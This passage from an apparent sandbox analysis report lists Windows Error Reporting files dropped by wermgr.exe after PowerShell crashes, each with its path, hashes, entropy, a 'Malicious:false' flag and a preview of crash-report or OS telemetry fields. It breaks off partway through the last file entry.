          Entropy (8bit):0.5342735330167038
          Encrypted:false
          SSDEEP:96:MHFLbqjvhrxYidTRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTAuf/VXT5NH:qtEJmGTR30wAAzuiFkZ24lO8
          MD5:F39632EFB1B4563DF9EA293C137D34D4
          SHA1:E7704F3CDC42950012597EA21A06B031E7CD2313
          SHA-256:F22F1529FAD3E6FC971682221641F656D388C0EBCB65B1642AFD247731BF2837
          SHA-512:52DA1B80A70ABEE96509A2779C2FA9A974107A2E6862C58C8F707E739DED8ED04C2209F1EC9784A2AA1FF62FD95562DA2700DF732DE5C18D1D6B1C1FBEA8A282
          Malicious:false
          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.4.2.3.3.8.2.5.0.3.3.2.3.9.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.4.2.3.2.0.8.4.7.1.3.2.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.c.3.2.8.a.b.-.7.4.6.0.-.4.0.4.0.-.a.8.2.3.-.a.0.f.0.b.8.c.3.0.a.4.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.3.c.-.0.0.0.1.-.0.0.1.5.-.e.e.4.9.-.a.5.1.9.3.2.f.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_5ac8cd7c-e124-47c2-a4d4-699b7dc06196\Report.wer

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):65536
          Entropy (8bit):0.5341820668909183
          Encrypted:false
          SSDEEP:96:1iU56MfFLj9rxYidgRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTA4f/VXTT:1719mGgR30wAAzuiFuZ24lO8
          MD5:176D7A0D5A9A28EB7E2E8D473D6B2878
          SHA1:3A4EFD36F97D1018C7036D2FF3083C08AD55268A
          SHA-256:B619551E25727CAE04075EF5023D956FE0C6FE76E6CDF45D74F15D0FE3E390A6
          SHA-512:C769ED41DADD497101448248265F6BE08762232AE30568E863208AEC477E743BB610A0BF8A388EBD14A9EA3ACB9F875446AD052B7EFF50A673102594433A7449
          Malicious:false
          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.4.2.3.2.4.3.1.5.1.5.5.8.3.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.4.2.3.0.5.3.0.8.1.4.0.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.c.8.c.d.7.c.-.e.1.2.4.-.4.7.c.2.-.a.4.d.4.-.6.9.9.b.7.d.c.0.6.1.9.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.9.0.-.0.0.0.1.-.0.0.1.5.-.e.6.8.f.-.1.a.b.c.3.1.f.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_8ad5e66d-79a3-4c96-9658-b402b8edb290\Report.wer

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):65536
          Entropy (8bit):0.5344421700521039
          Encrypted:false
          SSDEEP:96:Q0FHjvXrxYidQRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTAnnf/VXT5NHn:pRPmGQR30wAAzuiF/Z24lO8
          MD5:06F5892EC0273DD98AFE7402782D4CE5
          SHA1:E526021D2C4F78AD7A6030F4F625F8A6C3B25482
          SHA-256:5F593B9F4164256BB4170C3FC89C06F550FB55DF14CAAAC6251E4833745AA98B
          SHA-512:E273C5B12E259EF9EA5A8FC55F8FA339D1EA61C4ED153F7383C7FDCC6111DB58DF050D0CDBA19EFF5101BBF57FB6C75176C45E460FDB952E620124CDF19CC84F
          Malicious:false
          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.4.2.3.3.2.0.8.5.6.2.6.5.3.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.4.2.3.1.3.0.6.0.7.7.5.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.d.5.e.6.6.d.-.7.9.a.3.-.4.c.9.6.-.9.6.5.8.-.b.4.0.2.b.8.e.d.b.2.9.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.8.8.-.0.0.0.1.-.0.0.1.5.-.a.3.0.5.-.c.7.e.a.3.1.f.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_aa8d3bbe-ab8b-4e66-b348-b5e4a99848d3\Report.wer

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):65536
          Entropy (8bit):0.5345216928737276
          Encrypted:false
          SSDEEP:96:jLFlj8rxYid3RH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTAVf/VXT5NHBjF:3L8mG3R30wAAzuiF1Z24lO8
          MD5:30E9E2F9F66C6FDB427A01377BD5B3ED
          SHA1:0CC3EF1A14EAC0F070E6255EB75343B30B435D5A
          SHA-256:22907CC06C94087F2C1BE8D54F62995F09CFEEC08B84EF6C28C731A799D207CB
          SHA-512:345057E57BCAE6BA033324B4AAEC3D7B31380F2CC7DE857665955E14D1173F8520987FFD147F42F4A84B9FAE6A281832CAB8FC002E44FDDEDC316A40D4D94A59
          Malicious:false
          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.4.2.3.4.3.2.7.2.3.5.2.7.0.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.4.2.3.2.3.4.4.8.8.3.8.6.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.8.d.3.b.b.e.-.a.b.8.b.-.4.e.6.6.-.b.3.4.8.-.b.5.e.4.a.9.9.8.4.8.d.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.2.8.-.0.0.0.1.-.0.0.1.5.-.e.4.b.b.-.f.5.2.8.3.2.f.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_b738a297-2c33-445b-a6af-ab3f12057130\Report.wer

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):65536
          Entropy (8bit):0.5341125350532921
          Encrypted:false
          SSDEEP:96:lBUFaLjbZYrxYidoRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTAnnf/VXTT:ww3bZYmGoR30wAAzuiF/Z24lO8
          MD5:A9E13301D7BCDA49D46756FD828318C9
          SHA1:D696034194ABC0325BC0A876F0EBC4266BFA5724
          SHA-256:D27284139C229A0D27BF0569258FB064E3CE44E61C2F36844C089A485FCEF571
          SHA-512:765ABCFA523FC67C28FCAB4F588B0A30DD53323FB76CF86F647E0AB7ACE2B8A7EE0F204D650C7DA7F5588C968CC974AF98ADAF90C8A25ABDF3636162649C375A
          Malicious:false
          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.4.2.3.3.3.1.5.0.2.1.8.7.3.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.4.2.3.1.8.2.5.3.6.5.8.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.7.3.8.a.2.9.7.-.2.c.3.3.-.4.4.5.b.-.a.6.a.f.-.a.b.3.f.1.2.0.5.7.1.3.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.b.4.-.0.0.0.1.-.0.0.1.5.-.e.c.6.b.-.3.d.0.a.3.2.f.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_f30f9f23-2252-413a-815f-f103f029fbb2\Report.wer

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):65536
          Entropy (8bit):0.534338510360049
          Encrypted:false
          SSDEEP:96:kjFKUcjWrxYid64RH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTAnnf/VXT5t:edOWmG64R30wAAzuiF/Z24lO8
          MD5:80AB6275CA20B9827A0944C76C4BD071
          SHA1:8B0C9C2C2C7263A5598756C032F99D665485B92A
          SHA-256:E2C3BF1F0BF4073ADF205DBF0DED9E693BB27D774F9CA996CBBB3F3E94D0B578
          SHA-512:AB98A9FA6F91BE7699EC2FE78FC7F75ED1F4A3A71E8EF92675764D2E6C9276431F6BC4C8B89EEFE101B441ADD1D510FBD2754C0281CCD20BEF46B878E56F94EE
          Malicious:false
          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.4.2.3.2.8.7.7.3.0.7.7.5.8.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.4.2.3.0.7.7.9.0.9.0.4.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.3.0.f.9.f.2.3.-.2.2.5.2.-.4.1.3.a.-.8.1.5.f.-.f.1.0.3.f.0.2.9.f.b.b.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.0.8.-.0.0.0.1.-.0.0.1.5.-.5.f.8.8.-.7.6.c.b.3.1.f.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_fa71f64c-a402-424a-83dc-6695f6c834b8\Report.wer

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):65536
          Entropy (8bit):0.5343251723085193
          Encrypted:false
          SSDEEP:96:QyuFKjxrxYid0RH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTAuf/VXT5NHBx:VuCxmG0R30wAAzuiFkZ24lO8
          MD5:AFA06067A61514B6617F6C6761025753
          SHA1:BEE1A90DCDDA05BC058FF4F3E5E91F6EC2B1FAFF
          SHA-256:927001C7484FA892AD223CA5D675DF391766969575A82B2CBBC1007877C93300
          SHA-512:5B82CBDEBA70626D5972A385C67B636372AE49703FF8532E7DA9366F21DE39CCC5A8F25CB668248323900E57DDB4DA16F1C8D614000298C79AC9C47A26E5BC64
          Malicious:false
          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.4.2.3.3.3.8.7.6.8.6.7.9.9.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.4.2.3.1.5.6.5.5.9.5.5.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.7.1.f.6.4.c.-.a.4.0.2.-.4.2.4.a.-.8.3.d.c.-.6.6.9.5.f.6.c.8.3.4.b.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.f.8.-.0.0.0.1.-.0.0.1.5.-.4.1.c.a.-.4.c.f.a.3.1.f.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

          C:\ProgramData\Microsoft\Windows\WER\Temp\WER15D6.tmp.WERInternalMetadata.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):7418
          Entropy (8bit):3.6816464612013085
          Encrypted:false
          SSDEEP:96:RSIU6o7wVetboAG656YByNtwgmfHNV9re17K5aMUlim:R6l7wVeJoAt6YBy/wgmftq8pUlim
          MD5:64150A611D5903BA1DAE87FD43430EB7
          SHA1:40E56FED1A9FFBC9BFC046824DA4FC487EAB13AE
          SHA-256:25B9CA8760793AE5B88BCB393367E7BA85A9E8CD3C5879E558B34F953F88CB14
          SHA-512:B16862EA132A4053B834DE8F8B5095A172C40CAFFA587F953A435BCB2F1B686C8F11687C40F327EC3AD45D304CE46DFB911C9F0A05658D968CB9EE06E3750711
          Malicious:false
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.6.8.<./.P.i.

          C:\ProgramData\Microsoft\Windows\WER\Temp\WER1615.tmp.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):4899
          Entropy (8bit):4.566469815235324
          Encrypted:false
          SSDEEP:48:cvIwWl8zsVlNJg771I9JWWpW8VYYYm8M4JFKlnOtSFZuoyq8vT0Otjpytfvd:uIjfVlnI7237VkJFKlnnuoWT0wufvd
          MD5:BAC4A8181E56BE0F424EA874956758A4
          SHA1:E3AF884A68364D37E056FBAD6D8B02066BD0DC46
          SHA-256:941D524325B3E0044C9A9799E43D594D75A039ACD90EDCB255767B78A5605478
          SHA-512:508B9FB709EC83498EE2F76B010D7BAB9A74DB1CCEC8F527F583F6C6F9A204ADAA7A44EE19C411BECEA38D12304904345D860EB185B22153625F4AE1C885A449
          Malicious:false
          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="477102" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

          C:\ProgramData\Microsoft\Windows\WER\Temp\WER189E.tmp.WERInternalMetadata.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):7416
          Entropy (8bit):3.682666571888224
          Encrypted:false
          SSDEEP:96:RSIU6o7wVetb1o+36YB/uzgmfHNV9re17K5aMb8m:R6l7wVeJ1om6YB/Kgmftq8pb8m
          MD5:5D31DC9ACC4007FA74578DCD65A7F865
          SHA1:93CFAE70AA9A0C8EB0365DF3F08F655608184344
          SHA-256:AFD776B4FD72731C7EE6E3A5012A3B1D3C4324C870491F039A54C6B9A9363D8C
          SHA-512:7CFB25B479F2C57B30EC7D8C5700B9777F59F48A0D94632676551E8CAE98EB70A9961560094EC233CC2E4AD6EC4A8DE30FDE3897F984ECA85997DC14A85188EE
          Malicious:false
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.6.4.<./.P.i.

          C:\ProgramData\Microsoft\Windows\WER\Temp\WER19F7.tmp.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):4899
          Entropy (8bit):4.564203456921701
          Encrypted:false
          SSDEEP:48:cvIwWl8zsV1Jg771I9JWWpW8VYgYm8M4JFKlnOtSFupyq8vT0OtQytfTd:uIjfVPI7237V0JFKlnspWT0xufTd
          MD5:586D65227BBCDB4D80871EA6D4B7D6E7
          SHA1:BAE768F2E6120C598311C2BCA993D27E7919CB36
          SHA-256:B52D4F866DD27B7F100A72ECA8E9C2228848EA02CDD55AB965F58BAA56FE2481
          SHA-512:A8F60524CD8710154F0DF068FCF16B445E3629DC9CF64776D3B3EA328DD71B3D83DB98B847E6CC166DF2517692AF664A5C4BB29EF7FEFB8F1569143352B5BEE9
          Malicious:false
          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="477100" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

          C:\ProgramData\Microsoft\Windows\WER\Temp\WER4B33.tmp.WERInternalMetadata.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):7418
          Entropy (8bit):3.683549769351441
          Encrypted:false
          SSDEEP:96:RSIU6o7wVetbEFXsqj6YBD+m0JAgmfHNV9re17K5aMPY5m:R6l7wVeJEFXsG6YBD/AAgmftq8pPY5m
          MD5:A247A7BDB50A7B46DE5F1413B2A0314E
          SHA1:C789A8FD91B13478366E0056E5B04BFBDB0236D6
          SHA-256:DE0CF4D1F55C0FE3086A6B7C52891DF3B562F5B3235B7CFDC8FA84A0B746F096
